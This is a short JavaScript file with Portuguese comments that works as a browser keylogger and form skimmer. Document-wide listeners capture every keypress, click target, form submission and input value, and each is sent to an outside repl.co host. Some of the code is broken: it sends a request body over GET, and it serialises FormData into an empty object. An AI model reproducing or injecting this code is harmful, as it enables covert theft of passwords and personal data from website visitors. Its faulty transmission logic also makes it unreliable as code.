function enviarParaServidor(data) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://ea3baf39-e1e9-4737-9c28-8a869b79c933-00-1spc09uux8b1t.riker.repl.co/', true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE) {
            if (xhr.status === 200) {
                var resposta = JSON.parse(xhr.responseText);
                // Processar a resposta do servidor remoto
                console.log('Resposta do servidor:', resposta);
            } else {
                console.error('Erro ao enviar para o servidor:', xhr.status);
            }
        }
    };
    xhr.send(JSON.stringify(data));
}

// Capturar evento de tecla pressionada
document.addEventListener('keydown', function(event) {
    var data = { type: 'tecla', key: event.key };
    enviarParaServidor(data);
});

// Capturar evento de clique do mouse
document.addEventListener('click', function(event) {
    var data = { type: 'clique', target: event.target.id };
    enviarParaServidor(data);
});

// Capturar evento de submissão de formulário
document.addEventListener('submit', function(event) {
    var formData = new FormData(event.target);
    var data = { type: 'formulario', formData: formData };
    enviarParaServidor(data);
});

// Capturar evento de mudança em um elemento input
document.addEventListener('change', function(event) {
    if (event.target.tagName === 'INPUT') {
        var data = { type: 'inputChange', value: event.target.value };
        enviarParaServidor(data);
    }
});
